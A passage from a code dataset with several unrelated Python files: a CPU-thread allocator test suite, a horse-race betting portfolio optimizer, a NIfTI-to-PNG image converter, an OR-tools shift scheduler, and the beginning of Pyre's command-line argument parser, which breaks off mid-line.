titus_isolate.allocate.integer_program_cpu_allocator import IntegerProgramCpuAllocator\nfrom titus_isolate.docker.constants import STATIC\nfrom titus_isolate.model.processor.config import get_cpu\nfrom titus_isolate.model.processor.utils import is_cpu_full, DEFAULT_TOTAL_THREAD_COUNT\nfrom titus_isolate.model.workload import Workload\n\nconfig_logs(logging.DEBUG)\n\nALLOCATORS = [IntegerProgramCpuAllocator, GreedyCpuAllocator]\n\n\nclass TestCpu(unittest.TestCase):\n\n def test_assign_one_thread_empty_cpu(self):\n \"\"\"\n Workload 0: 1 thread --> (p:0 c:0 t:0)\n \"\"\"\n for allocator_class in ALLOCATORS:\n cpu = get_cpu()\n allocator = allocator_class(cpu)\n self.assertEqual(DEFAULT_TOTAL_THREAD_COUNT, len(cpu.get_empty_threads()))\n\n w = Workload(uuid.uuid4(), 1, STATIC)\n\n allocator.assign_threads(w)\n self.assertEqual(DEFAULT_TOTAL_THREAD_COUNT - 1, len(cpu.get_empty_threads()))\n self.assertEqual(1, len(cpu.get_claimed_threads()))\n self.assertEqual(0, cpu.get_claimed_threads()[0].get_id())\n\n def test_assign_two_threads_empty_cpu_ip(self):\n \"\"\"\n Workload 0: 2 threads --> (p:0 c:0 t:0) (p:0 c:1 t:0)\n \"\"\"\n cpu = get_cpu()\n allocator = IntegerProgramCpuAllocator(cpu)\n w = Workload(uuid.uuid4(), 2, STATIC)\n\n allocator.assign_threads(w)\n self.assertEqual(2, len(cpu.get_claimed_threads()))\n\n # Expected core and threads\n core00 = cpu.get_packages()[0].get_cores()[0]\n core01 = cpu.get_packages()[0].get_cores()[1]\n thread0 = core00.get_threads()[0]\n self.assertEqual(0, thread0.get_id())\n self.assertTrue(thread0.is_claimed())\n thread1 = core01.get_threads()[0]\n self.assertEqual(1, thread1.get_id())\n self.assertTrue(thread1.is_claimed())\n\n def test_assign_two_threads_empty_cpu_greedy(self):\n \"\"\"\n Workload 0: 2 threads --> (p:0 c:0 t:0) (p:0 c:1 t:1)\n \"\"\"\n cpu = get_cpu()\n allocator = GreedyCpuAllocator(cpu)\n w = Workload(uuid.uuid4(), 2, STATIC)\n\n allocator.assign_threads(w)\n self.assertEqual(2, len(cpu.get_claimed_threads()))\n\n # Expected core and threads\n core00 = cpu.get_packages()[0].get_cores()[0]\n thread0 = core00.get_threads()[0]\n self.assertEqual(0, thread0.get_id())\n self.assertTrue(thread0.is_claimed())\n thread1 = core00.get_threads()[1]\n self.assertEqual(8, thread1.get_id())\n self.assertTrue(thread1.is_claimed())\n\n def test_assign_two_workloads_empty_cpu_ip(self):\n \"\"\"\n Workload 0: 2 threads --> (p:0 c:0 t:0) (p:0 c:1 t:0)\n Workload 1: 1 thread --> (p:1 c:0 t:0)\n \"\"\"\n cpu = get_cpu()\n allocator = IntegerProgramCpuAllocator(cpu)\n w0 = Workload(uuid.uuid4(), 2, STATIC)\n w1 = Workload(uuid.uuid4(), 1, STATIC)\n\n allocator.assign_threads(w0)\n allocator.assign_threads(w1)\n self.assertEqual(3, len(cpu.get_claimed_threads()))\n\n packages = cpu.get_packages()\n\n # WORKLOAD 0\n core00 = packages[0].get_cores()[0]\n core01 = packages[0].get_cores()[1]\n thread0 = core00.get_threads()[0]\n self.assertEqual(0, thread0.get_id())\n self.assertTrue(thread0.is_claimed())\n thread1 = core01.get_threads()[0]\n self.assertEqual(1, thread1.get_id())\n self.assertTrue(thread1.is_claimed())\n\n # WORKLOAD 1\n core00 = packages[1].get_cores()[0]\n thread4 = core00.get_threads()[0]\n self.assertEqual(4, thread4.get_id())\n self.assertTrue(thread4.is_claimed())\n\n def test_assign_two_workloads_empty_cpu_greedy(self):\n \"\"\"\n Workload 0: 2 threads --> (p:0 c:0 t:0) (p:0 c:0 t:1)\n Workload 1: 1 thread --> (p:1 c:0 t:0)\n \"\"\"\n cpu = get_cpu()\n allocator = GreedyCpuAllocator(cpu)\n w0 = Workload(uuid.uuid4(), 2, STATIC)\n w1 = Workload(uuid.uuid4(), 1, STATIC)\n\n allocator.assign_threads(w0)\n allocator.assign_threads(w1)\n self.assertEqual(3, len(cpu.get_claimed_threads()))\n\n packages = cpu.get_packages()\n\n # WORKLOAD 0\n core00 = packages[0].get_cores()[0]\n thread0 = core00.get_threads()[0]\n self.assertEqual(0, thread0.get_id())\n self.assertTrue(thread0.is_claimed())\n thread1 = core00.get_threads()[1]\n self.assertEqual(8, thread1.get_id())\n self.assertTrue(thread1.is_claimed())\n\n # WORKLOAD 1\n core00 = packages[1].get_cores()[0]\n thread4 = core00.get_threads()[0]\n self.assertEqual(4, thread4.get_id())\n self.assertTrue(thread4.is_claimed())\n\n def test_assign_ten_threads_empty_cpu_ip(self):\n \"\"\"\n Workload 0: 10 threads --> (p:0 c:[0-7] t:[0-9])\n | 1 | 1 | 1 | 1 |\n | 1 | 1 | | |\n | ------------- |\n | 1 | 1 | 1 | 1 |\n | | | | |\n \"\"\"\n cpu = get_cpu()\n allocator = IntegerProgramCpuAllocator(cpu)\n w = Workload(uuid.uuid4(), 10, STATIC)\n\n allocator.assign_threads(w)\n self.assertEqual(10, len(cpu.get_claimed_threads()))\n\n expected_thread_ids = [0, 1, 2, 3, 4, 5, 6, 7, 8, 12]\n\n thread_ids = [thread.get_id() for thread in cpu.get_claimed_threads()]\n thread_ids.sort()\n\n self.assertEqual(expected_thread_ids, thread_ids)\n\n def test_fill_cpu(self):\n \"\"\"\n Workload 0: 8 cores\n Workload 1: 4 cores\n Workload 2: 2 cores\n Workload 3: 1 core\n Workload 4: 1 core\n --------------------\n Total: 16 cores\n \"\"\"\n for allocator_class in ALLOCATORS:\n cpu = get_cpu()\n allocator = allocator_class(cpu)\n workloads = [\n Workload(uuid.uuid4(), 8, STATIC),\n Workload(uuid.uuid4(), 4, STATIC),\n Workload(uuid.uuid4(), 2, STATIC),\n Workload(uuid.uuid4(), 1, STATIC),\n Workload(uuid.uuid4(), 1, STATIC)]\n\n tot_req = 0\n for w in workloads:\n allocator.assign_threads(w)\n tot_req += w.get_thread_count()\n self.assertEqual(tot_req, len(cpu.get_claimed_threads()))\n\n def test_filling_holes_ip(self):\n \"\"\"\n Initialize with fragmented placement, then fill the instance. Result should be\n less fragmented, with the first workload completely filling a socket.\n | a | | a | |\n | | a | | a |\n | ------------- |\n | | a | | a |\n | a | | a | |\n \"\"\"\n cpu = get_cpu()\n allocator = IntegerProgramCpuAllocator(cpu)\n\n # Initialize fragmented workload\n wa = Workload(uuid.uuid4(), 8, STATIC)\n\n p0 = cpu.get_packages()[0]\n p0.get_cores()[0].get_threads()[0].claim(wa.get_id())\n p0.get_cores()[1].get_threads()[1].claim(wa.get_id())\n p0.get_cores()[2].get_threads()[0].claim(wa.get_id())\n p0.get_cores()[3].get_threads()[1].claim(wa.get_id())\n\n p1 = cpu.get_packages()[1]\n p1.get_cores()[0].get_threads()[1].claim(wa.get_id())\n p1.get_cores()[1].get_threads()[0].claim(wa.get_id())\n p1.get_cores()[2].get_threads()[1].claim(wa.get_id())\n p1.get_cores()[3].get_threads()[0].claim(wa.get_id())\n\n self.assertEqual(8, len(cpu.get_empty_threads()))\n\n # Fill the rest of the CPU\n w0 = Workload(uuid.uuid4(), 2, STATIC)\n w1 = Workload(uuid.uuid4(), 3, STATIC)\n w2 = Workload(uuid.uuid4(), 1, STATIC)\n w3 = Workload(uuid.uuid4(), 2, STATIC)\n\n workloads = [wa, w0, w1, w2, w3]\n for w in workloads:\n allocator.assign_threads(w)\n\n self.assertEqual(0, len(cpu.get_empty_threads()))\n\n # first workload should be filling completely a socket to avoid cross-socket job layout\n for package in cpu.get_packages():\n if package.get_cores()[0].get_threads()[0].get_workload_id() != wa.get_id():\n continue\n ids = [t.get_workload_id() for core in package.get_cores() for t in core.get_threads()]\n self.assertListEqual(ids, [wa.get_id()] * 8)\n\n def test_assign_to_full_cpu_fails(self):\n for allocator_class in ALLOCATORS:\n # Fill the CPU\n cpu = get_cpu()\n allocator = allocator_class(cpu)\n w0 = Workload(uuid.uuid4(), DEFAULT_TOTAL_THREAD_COUNT, STATIC)\n allocator.assign_threads(w0)\n self.assertTrue(is_cpu_full(cpu))\n\n # Fail to claim one more thread\n w1 = Workload(uuid.uuid4(), 1, STATIC)\n with self.assertRaises(ValueError):\n allocator.assign_threads(w1)\n\n def test_free_cpu(self):\n for allocator_class in ALLOCATORS:\n cpu = get_cpu()\n allocator = allocator_class(cpu)\n self.assertEqual(DEFAULT_TOTAL_THREAD_COUNT, len(cpu.get_empty_threads()))\n\n w = Workload(uuid.uuid4(), 3, STATIC)\n allocator.assign_threads(w)\n self.assertEqual(\n DEFAULT_TOTAL_THREAD_COUNT - w.get_thread_count(),\n len(cpu.get_empty_threads()))\n\n allocator.free_threads(w.get_id())\n self.assertEqual(DEFAULT_TOTAL_THREAD_COUNT, len(cpu.get_empty_threads()))\n\n def test_free_cpu_3_workloads(self):\n # Add 3 workloads sequentially, and then remove the 2nd one added.\n for allocator_class in ALLOCATORS:\n cpu = get_cpu()\n allocator = allocator_class(cpu)\n\n w0 = Workload(123, 3, STATIC)\n w1 = Workload(456, 2, STATIC)\n w2 = Workload(789, 4, STATIC)\n allocator.assign_threads(w0)\n allocator.assign_threads(w1)\n allocator.assign_threads(w2)\n self.assertEqual(3 + 4 + 2, len(cpu.get_claimed_threads()))\n\n allocator.free_threads(w1.get_id())\n self.assertEqual(3 + 4, len(cpu.get_claimed_threads()))\n\n workload_ids_left = set()\n for t in cpu.get_threads():\n if t.is_claimed():\n workload_ids_left.add(t.get_workload_id())\n\n self.assertListEqual(sorted(list(workload_ids_left)), [123, 789])\n\n def test_cache_ip(self):\n \"\"\"\n [add a=2, add b=2, remove b=2, add c=2, remove a=2, add d=2] should lead to the following cache entries:\n (state=[], req=[2])\n (state=[2], req=[2,2])\n (state=[2,2], req=[2,0])\n [cache hit]\n [cache hit]\n (state=[2,2], req=[2,2]) but different layout\n \"\"\"\n cpu = get_cpu()\n allocator = IntegerProgramCpuAllocator(cpu)\n\n allocator.assign_threads(Workload(\"a\", 2, STATIC))\n self.assertEqual(1, len(allocator._IntegerProgramCpuAllocator__cache))\n\n allocator.assign_threads(Workload(\"b\", 2, STATIC))\n self.assertEqual(2, len(allocator._IntegerProgramCpuAllocator__cache))\n\n allocator.free_threads(\"b\")\n self.assertEqual(3, len(allocator._IntegerProgramCpuAllocator__cache))\n\n allocator.assign_threads(Workload(\"c\", 2, STATIC))\n self.assertEqual(3, len(allocator._IntegerProgramCpuAllocator__cache))\n\n allocator.free_threads(\"a\")\n self.assertEqual(4, len(allocator._IntegerProgramCpuAllocator__cache))\n\n allocator.assign_threads(Workload(\"d\", 2, STATIC))\n self.assertEqual(5, len(allocator._IntegerProgramCpuAllocator__cache))","sub_path":"tests/allocate/test_allocate.py","file_name":"test_allocate.py","file_ext":"py","file_size_in_byte":11741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"412856980","text":"from itertools import permutations, combinations\nimport numpy as np\nfrom torch import nn\nimport torch\nimport torch.nn.functional as F\nfrom matplotlib import pyplot as plt\n\n\nclass Portfolio:\n\n def __init__(self, h, odds=None, single=True, place=True, double=True, place_q=True):\n size = 0\n if single:\n size += h\n if place:\n size += h\n if double:\n size += h*(h-1)/2\n if place_q:\n size += h*(h-1)/2\n\n self.single = single\n self.place = place\n self.double = double\n self.place_q = place_q\n\n w = np.random.normal(loc=1, scale=0.2, size=[1, int(size)])\n self.weights = torch.tensor(w, dtype=torch.float32, requires_grad=True)\n self.optim = torch.optim.SGD([self.weights], lr=0.0001, momentum=0.2)\n self.horse = [str(i + 1) for i in range(h)]\n self.horse_combination = [c for c in combinations(self.horse, 2)]\n self.odds = odds\n\n def forward(self, outcomes, prob):\n amount = F.relu(self.weights.sum())\n r = outcomes * prob\n r = r * self.weights\n r = r.sum(dim=1) - amount\n return -r.sum()\n\n def plot(self):\n\n pays = [self._return(r) for r in permutations(self.horse, 3)]\n pays = np.stack(pays, axis=0)\n pays = torch.tensor(pays)\n\n w = F.relu(self.weights).detach()\n invest = float(w.sum())\n print('Total Investment: ', invest)\n w = pays * w\n w = w.sum(dim=1)\n w = w.numpy()\n print('Average return = ', np.mean(w) / invest)\n losses = 0\n for i in w:\n if i < invest:\n losses += 1\n print('Loss Probability = ', losses/len(w))\n plt.hist(w, bins='auto')\n plt.axvline(x=invest, color='Red')\n plt.show()\n\n def optimize(self, prob=None):\n\n pays = [self._return(r) for r in permutations(self.horse, 3)]\n no_outcomes = len(pays)\n pays = np.stack(pays, axis=0)\n pays = torch.tensor(pays)\n\n if prob is None:\n prob = torch.ones(no_outcomes, dtype=torch.float)\n\n for i in range(300):\n self.optim.zero_grad()\n loss = self.forward(pays, prob)\n loss.backward()\n self.optim.step()\n\n def profit(self, winner):\n r = self._return(winner)\n r = r.view([-1, 1])\n p = torch.matmul(F.relu(self.weights), r)\n return float(p)\n\n @property\n def amount(self):\n a = F.relu(self.weights).sum()\n return float(a)\n\n def _return(self, winner):\n\n r = []\n i = 0\n\n if self.single:\n for s in self.horse:\n if s == winner[0]:\n r.append(self.odds[i])\n else:\n r.append(0)\n i += 1\n\n if self.place:\n for p in self.horse:\n if p == winner[0] or p == winner[1] or p == winner[2]:\n r.append(self.odds[i])\n else:\n r.append(0)\n i += 1\n\n if self.double:\n for d in self.horse_combination:\n if winner[0] in d and winner[1] in d:\n r.append(self.odds[i])\n else:\n r.append(0)\n i += 1\n\n if self.place_q:\n for pq in self.horse_combination:\n if pq[0] in winner and pq[1] in winner:\n r.append(self.odds[i])\n else:\n r.append(0)\n i += 1\n\n return torch.tensor(r)\n\n\nclass Odds:\n\n def __init__(self, odd_dict):\n self.odd = odd_dict\n self.no_horse = len(odd_dict['win+place'])-1\n self.numbers = [str(i + 1) for i in range(self.no_horse)]\n\n @staticmethod\n def locate_odds(df, h1, h2=None, option=None):\n\n if h2 is None:\n h1 = int(h1)\n if option == 'win':\n y = h1\n x = 4\n else:\n y = h1\n x = 5\n else:\n h1 = int(h1)\n h2 = int(h2)\n if h1 > h2:\n tmp = h1\n h1 = h2\n h2 = tmp\n if h1 < 8:\n y = h1\n x = h2 + 1\n else:\n y = h2 - 7\n x = h1 - 7\n return float(df.loc[y, x])\n\n @staticmethod\n def random_odds(h, factor=0.82, single=True, place=True, double=True, place_q=True):\n\n odds = []\n\n if single:\n mean = h * factor\n single_odd = np.random.normal(loc=mean, scale=h / 2, size=h)\n single_odd = np.abs(single_odd)\n odds.extend(single_odd.tolist())\n\n if place:\n mean = h / 3 * factor\n place_odd = np.random.normal(loc=mean, scale=h / 3, size=h)\n single_odd = np.abs(place_odd)\n odds.extend(place_odd.tolist())\n\n if double:\n mean = h * (h - 1) / 2 * factor\n double_odd = np.random.normal(loc=mean, scale=2 * h, size=int(h * (h - 1) / 2))\n double_odd = np.abs(double_odd)\n odds.extend(double_odd.tolist())\n\n if place_q:\n mean = h * (h - 1) / 6 * factor\n pq_odd = np.random.normal(loc=mean, scale=h, size=int(h * (h - 1) / 2))\n pq_odd = np.abs(pq_odd)\n odds.extend(pq_odd.tolist())\n\n return odds\n\n def to_list(self, single=True, place=True, double=True, place_q=True):\n\n odds = []\n\n if single:\n for h in self.numbers:\n odd = self.locate_odds(self.odd['win+place'], h, option='win')\n odds.append(odd)\n\n if place:\n for h in self.numbers:\n odd = self.locate_odds(self.odd['win+place'], h, option='place')\n odds.append(odd)\n\n if double:\n for h in combinations(self.numbers, 2):\n odd = self.locate_odds(self.odd['quinella'], *h)\n odds.append(odd)\n\n if place_q:\n for h in combinations(self.numbers, 2):\n odd = self.locate_odds(self.odd['quinella_p'], *h)\n odds.append(odd)\n\n return odds\n\n\nimport pickle as pk\nf = open('./Data/Odds/20190714_odd.dfdl', 'rb')\nod = pk.load(f)\nf.close()\nodd = Odds(od[0])\no = odd.to_list()\nport = Portfolio(14, o)\nport.optimize()\n\nport.plot()\np = port.profit(['6', '1', '4'])\nprint(p)\n\n\n\n\n","sub_path":"protfolio.py","file_name":"protfolio.py","file_ext":"py","file_size_in_byte":6464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"204601921","text":"# First, install below packages\r\n# pip install scipy\r\n#\r\n# pip install shutil\r\n#\r\n# pip install os\r\n#\r\n# pip install nibabel\r\n#\r\n# pip install numpy\r\n\r\n\r\nimport os\r\nimport numpy as np\r\nfrom nibabel.testing import data_path\r\nimport nibabel as nib\r\nimport matplotlib.pylab as plt\r\nimport time\r\n\r\n\r\ndef nii2png(nii_directory):\r\n example_filename = os.path.join(data_path, nii_directory)\r\n img = nib.load(example_filename)\r\n data = np.array(img.get_fdata())\r\n data = np.moveaxis(data, -1, 0)\r\n print(\"shape:\", data.shape)\r\n return data\r\n\r\n\r\ndef draw(images, name, columns=4):\r\n rows = int(np.ceil(images.shape[0] / columns))\r\n max_size = 20\r\n\r\n width = min(columns * 5, max_size)\r\n height = width * rows // columns\r\n\r\n plt.figure(figsize=(width, height))\r\n plt.gray()\r\n plt.subplots_adjust(0, 0, 1, 1, 0.01, 0.01)\r\n for i in range(images.shape[0]):\r\n plt.subplot(rows, columns, i + 1), plt.imshow(images[i]), plt.axis('off')\r\n plt.savefig(name)\r\n print(\"file saved at\", name)\r\n plt.close()\r\n\r\n\r\ndir = input(\"Enter the .nii file path: e.g. C:/Users/Name/nii2png/file.nii \\n\")\r\nout_dir = input(\"Enter the output path: e.g. C:/Users/Name/nii2png/output.png \\n\")\r\nstart_time = time.time()\r\ndata = nii2png(dir)\r\ndraw(data, out_dir)\r\nprint(f'Conversion is done in {time.time() - start_time} secs.')\r\n","sub_path":"nii2png.py","file_name":"nii2png.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"647098817","text":"import csv\nimport os.path\nimport numpy as np\nimport pandas as pd\nfrom numpy import number\n\nfrom . import database, utils\nfrom shutil import copyfile\nfrom ortools.sat.python import cp_model\n\n###################### creat shifts ########################\n# insert to matrix all workers that applied shifts\ndef pre_condition_for_creating_shifts(a, b, c):\n shifts = np.zeros((a, b, c), dtype=int)\n current_week = str(utils.get_sunday_date(1))\n workers_names = []\n w = 0\n d = 0\n s = 0\n for worker in utils.WORKER_LIST:\n if not database.database.child('worker_preference').child(worker).child(current_week).child('1_sunday').child('1_morning').get().val() == None:\n workers_names.append(worker)\n for day in utils.DAYS:\n for shift in utils.SHIFTS:\n shifts[w][d][s] = int(database.database.child('worker_preference').child(worker).child(current_week).child(day).child(shift).get().val())\n if s == 2:\n d = d + 1\n s = 0\n else:\n s = s + 1\n d = 0\n s = 0\n w = w + 1\n return shifts, workers_names\n\ndef post_condition_for_creating_shifts(final_shifts):\n current_week = str(utils.get_sunday_date(1))\n i = 0\n for s in utils.SHIFTS:\n for d in utils.DAYS:\n database.database.child('board').child(current_week).child(d).child(s).set(final_shifts[i])\n i = i + 1\n\n\ndef create_shifts():\n num_workers = 0\n for user in database.database.child('worker_preference').get():\n for week in user.val():\n if week == str(utils.get_sunday_date(1)):\n num_workers = num_workers + 1\n if num_workers == 0 :\n return \"No one applied to any shifts\"\n num_days = 7\n num_shifts = 3\n all_workers = range(num_workers)\n all_shifts = range(num_shifts)\n all_days = range(num_days)\n shift_requests, workers_names = pre_condition_for_creating_shifts(num_workers,num_days,num_shifts)\n # Creates the model.\n model = cp_model.CpModel()\n\n # Creates shift variables.\n # shifts[(n, d, s)]: worker 'n' works shift 's' on day 'd'.\n shifts = {}\n for n in all_workers:\n for d in all_days:\n for s in all_shifts:\n shifts[(n, d,\n s)] = model.NewBoolVar('shift_n%id%is%i' % (n, d, s))\n\n # Each shift is assigned to exactly one worker in.\n for d in all_days:\n for s in all_shifts:\n model.Add(sum(shifts[(n, d, s)] for n in all_workers) == 1)\n\n # Each worker works at most one shift per day.\n for n in all_workers:\n for d in all_days:\n model.Add(sum(shifts[(n, d, s)] for s in all_shifts) <= 1)\n\n # Try to distribute the shifts evenly, so that each worker works\n # min_shifts_per_worker shifts. If this is not possible, because the total\n # number of shifts is not divisible by the number of workers, some workers will\n # be assigned one more shift.\n min_shifts_per_worker = (num_shifts * num_days) // num_workers\n if num_shifts * num_days % num_workers == 0:\n max_shifts_per_worker = min_shifts_per_worker\n else:\n max_shifts_per_worker = min_shifts_per_worker + 1\n for n in all_workers:\n num_shifts_worked = 0\n for d in all_days:\n for s in all_shifts:\n num_shifts_worked += shifts[(n, d, s)]\n model.Add(min_shifts_per_worker <= num_shifts_worked)\n model.Add(num_shifts_worked <= max_shifts_per_worker)\n\n final_shifts = []\n id = []\n # pylint: disable=g-complex-comprehension\n model.Maximize(sum(shift_requests[n][d][s] * shifts[(n, d, s)] for n in all_workers for d in all_days for s in all_shifts))\n # Creates the solver and solve.\n solver = cp_model.CpSolver()\n solver.Solve(model)\n for s in all_shifts:\n for d in all_days:\n print('Day', d)\n for n in all_workers:\n if solver.Value(shifts[(n, d, s)]) == 1:\n if shift_requests[n][d][s] == 1:\n final_shifts.append(workers_names[n])\n print('Worker', workers_names[n], 'works shift', s, '(requested).')\n else:\n final_shifts.append(workers_names[n] + \" suggestion\")\n print('Worker', workers_names[n], 'works shift', s, '(not requested).')\n print()\n post_condition_for_creating_shifts(final_shifts)\n\n # Statistics.\n print()\n print('Statistics')\n print(' - Number of shift requests met = %i' % solver.ObjectiveValue(),\n '(out of', num_workers * min_shifts_per_worker, ')')\n print(' - wall time : %f s' % solver.WallTime())\n\n return \"Done\"","sub_path":"Shifts/create_shifts_algo.py","file_name":"create_shifts_algo.py","file_ext":"py","file_size_in_byte":4801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"419123578","text":"# Copyright (c) 2016-present, Facebook, Inc.\n#\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\n\n\nimport argparse\nimport logging\nimport os\nimport shutil\nimport sys\nimport time\nimport traceback\nfrom typing import Type # noqa\n\nfrom . import (\n assert_writable_directory,\n buck,\n commands,\n find_log_directory,\n get_binary_version_from_file,\n is_capable_terminal,\n log,\n log_statistics,\n readable_directory,\n switch_root,\n translate_arguments,\n)\nfrom .analysis_directory import AnalysisDirectory, resolve_analysis_directory\nfrom .commands import ( # noqa\n Command,\n ExitCode,\n IncrementalStyle,\n ProfileOutput,\n reporting,\n)\nfrom .configuration import Configuration\nfrom .exceptions import EnvironmentException\nfrom .version import __version__\n\n\nLOG = logging.getLogger(__name__) # type: logging.Logger\n\n\ndef main() -> int:\n def executable_file(file_path: str) -> str:\n if not os.path.isfile(file_path):\n raise EnvironmentException(\"%s is not a valid file\" % file_path)\n if not os.access(file_path, os.X_OK):\n raise EnvironmentException(\"%s is not an executable file\" % file_path)\n return file_path\n\n def writable_directory(path: str) -> str:\n # Create the directory if it does not exist.\n try:\n os.makedirs(path)\n except FileExistsError:\n pass\n assert_writable_directory(path)\n return path\n\n def file_exists(path: str) -> str:\n if not os.path.exists(path):\n raise argparse.ArgumentTypeError(\"ERROR: \" + str(path) + \" does not exist\")\n return path\n\n parser = argparse.ArgumentParser(\n allow_abbrev=False,\n formatter_class=argparse.RawTextHelpFormatter,\n epilog=\"environment variables:\"\n \"\\n `PYRE_BINARY` overrides the pyre binary used.\"\n \"\\n `PYRE_VERSION_HASH` overrides the pyre version set in the \"\n \"configuration files.\",\n )\n\n parser.add_argument(\n \"-l\", \"--local-configuration\", type=str, help=\"Use a local configuration\"\n )\n\n parser.add_argument(\n \"--version\",\n action=\"store_true\",\n help=\"Print the client and binary versions of Pyre.\",\n )\n\n parser.add_argument(\"--debug\", action=\"store_true\", help=argparse.SUPPRESS)\n parser.add_argument(\"--sequential\", action=\"store_true\", help=argparse.SUPPRESS)\n parser.add_argument(\"--strict\", action=\"store_true\", help=argparse.SUPPRESS)\n parser.add_argument(\"--additional-check\", action=\"append\", help=argparse.SUPPRESS)\n\n parser.add_argument(\n \"--show-error-traces\",\n action=\"store_true\",\n help=\"Display errors trace information\",\n )\n\n # Logging.\n parser.add_argument(\n \"--output\",\n choices=[commands.reporting.TEXT, commands.reporting.JSON],\n default=commands.reporting.TEXT,\n help=\"How to format output\",\n )\n parser.add_argument(\"--verbose\", action=\"store_true\", help=\"Enable verbose logging\")\n parser.add_argument(\n \"--enable-profiling\", action=\"store_true\", help=argparse.SUPPRESS\n )\n parser.add_argument(\n \"--enable-memory-profiling\", action=\"store_true\", help=argparse.SUPPRESS\n )\n parser.add_argument(\n \"-n\",\n \"--noninteractive\",\n action=\"store_true\",\n help=\"Disable interactive logging\",\n )\n parser.add_argument(\n \"--hide-parse-errors\",\n action=\"store_true\",\n help=\"Hide detailed information about parse errors\",\n )\n parser.add_argument(\n \"--show-parse-errors\",\n action=\"store_true\",\n help=\"[DEPRECATED] Show detailed information about parse errors\",\n )\n parser.add_argument(\n \"--logging-sections\", help=argparse.SUPPRESS # Enable sectional logging.\n )\n parser.add_argument(\n \"--log-identifier\",\n default=\"\",\n help=argparse.SUPPRESS, # Add given identifier to logged samples.\n )\n parser.add_argument(\n \"--log-directory\", help=argparse.SUPPRESS # Override default location for logs\n )\n parser.add_argument(\n \"--logger\", help=argparse.SUPPRESS # Specify custom logging binary.\n )\n parser.add_argument(\"--formatter\", help=argparse.SUPPRESS)\n\n # Link tree determination.\n buck_arguments = parser.add_argument_group(\"buck\")\n buck_arguments.add_argument(\n \"--target\", action=\"append\", dest=\"targets\", help=\"The buck target to check\"\n )\n buck_arguments.add_argument(\n \"--build\",\n action=\"store_true\",\n help=\"Freshly build all the necessary artifacts.\",\n )\n buck_arguments.add_argument(\n \"--use-buck-builder\",\n action=\"store_true\",\n help=\"Use Pyre's experimental builder for Buck projects.\",\n )\n buck_arguments.add_argument(\n \"--use-legacy-builder\",\n action=\"store_true\",\n help=\"Use Pyre's legacy builder for Buck projects.\",\n )\n buck_arguments.add_argument(\n \"--buck-builder-debug\", action=\"store_true\", help=argparse.SUPPRESS\n )\n\n source_directories = parser.add_argument_group(\"source-directories\")\n source_directories.add_argument(\n \"--source-directory\",\n action=\"append\",\n dest=\"source_directories\",\n help=\"The source directory to check\",\n type=os.path.abspath,\n )\n source_directories.add_argument(\n \"--filter-directory\", help=argparse.SUPPRESS # override filter directory\n )\n\n parser.add_argument(\n \"--use-global-shared-analysis-directory\",\n action=\"store_true\",\n help=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"--no-saved-state\",\n action=\"store_true\",\n help=\"Don't attempt to load Pyre from a saved state.\",\n )\n\n # Handling of search path\n parser.add_argument(\n \"--search-path\",\n action=\"append\",\n default=[],\n type=readable_directory,\n help=\"Add an additional directory of modules and stubs to include\"\n \" in the type environment\",\n )\n parser.add_argument(\n \"--preserve-pythonpath\",\n action=\"store_true\",\n default=False,\n help=\"Preserve the value of the PYTHONPATH environment variable and \"\n \"inherit the current python environment's search path\",\n )\n\n parser.add_argument(\n \"--binary\",\n default=None,\n type=executable_file,\n help=\"Location of the pyre binary\",\n )\n\n parser.add_argument(\n \"--buck-builder-binary\",\n default=None,\n help=\"Location of the buck builder binary\",\n )\n parser.add_argument(\"--buck-builder-target\", default=None, help=argparse.SUPPRESS)\n\n parser.add_argument(\n \"--exclude\",\n action=\"append\",\n default=[],\n help=\"Exclude files and directories matching this regexp from parsing\",\n )\n\n # Typeshed stubs location\n parser.add_argument(\n \"--typeshed\",\n default=None,\n type=readable_directory,\n help=\"Location of the typeshed stubs\",\n )\n parser.add_argument(\n \"--save-initial-state-to\",\n default=None,\n help=\"Path to serialize pyre's initial state to.\",\n )\n parser.add_argument(\n \"--load-initial-state-from\", default=None, type=str, help=argparse.SUPPRESS\n )\n parser.add_argument(\n \"--changed-files-path\", default=None, type=str, help=argparse.SUPPRESS\n )\n parser.add_argument(\n \"--saved-state-project\", default=None, type=str, help=argparse.SUPPRESS\n )\n # Temporary flag to help migrate to json sockets for incremental and query commands.\n parser.add_argument(\n \"--use-json-sockets\", action=\"store_true\", default=False, help=argparse.SUPPRESS\n )\n # Subcommands.\n parsed_commands = parser.add_subparsers(\n metavar=\"{analyze, check, color, kill, incremental, initialize (init), \"\n \"query, rage, restart, statistics, start, stop}\",\n help=\"\"\"\n The pyre command to run; defaults to `incremental`.\n Run `pyre command --help` for documentation on a specific command.\n \"\"\",\n )\n\n incremental_help = \"\"\"\n Connects to a running Pyre server and returns the current type errors for your\n project. If no server exists for your projects, starts a new one. Running `pyre`\n implicitly runs `pyre incremental`.\n\n By default, incremental checks ensure that all dependencies of changed files are\n analyzed before returning results. If you'd like to get partial type checking\n results eagerly, you can run `pyre incremental --nonblocking`.\n \"\"\"\n incremental = parsed_commands.add_parser(\n commands.Incremental.NAME, epilog=incremental_help\n )\n incremental.set_defaults(command=commands.Incremental)\n incremental.add_argument(\n \"--nonblocking\",\n action=\"store_true\",\n help=(\n \"Ask the server to return partial results immediately, \"\n \"even if analysis is still in progress.\"\n ),\n )\n incremental.add_argument(\n \"--incremental-style\",\n type=IncrementalStyle,\n choices=list(IncrementalStyle),\n default=IncrementalStyle.SHALLOW,\n help=\"How to approach doing incremental checks.\",\n )\n rage = parsed_commands.add_parser(\n commands.Rage.NAME,\n epilog=\"\"\"\n Collects troubleshooting diagnostics for Pyre, and writes this information to\n the terminal.\n \"\"\",\n )\n rage.set_defaults(command=commands.Rage)\n\n check = parsed_commands.add_parser(\n commands.Check.NAME,\n epilog=\"\"\"\n Runs a one-time check of a project without initializing a type check server.\n \"\"\",\n )\n check.set_defaults(command=commands.Check)\n\n color = parsed_commands.add_parser(commands.Color.NAME)\n color.add_argument(\"path\")\n color.set_defaults(command=commands.Color)\n\n deobfuscate = 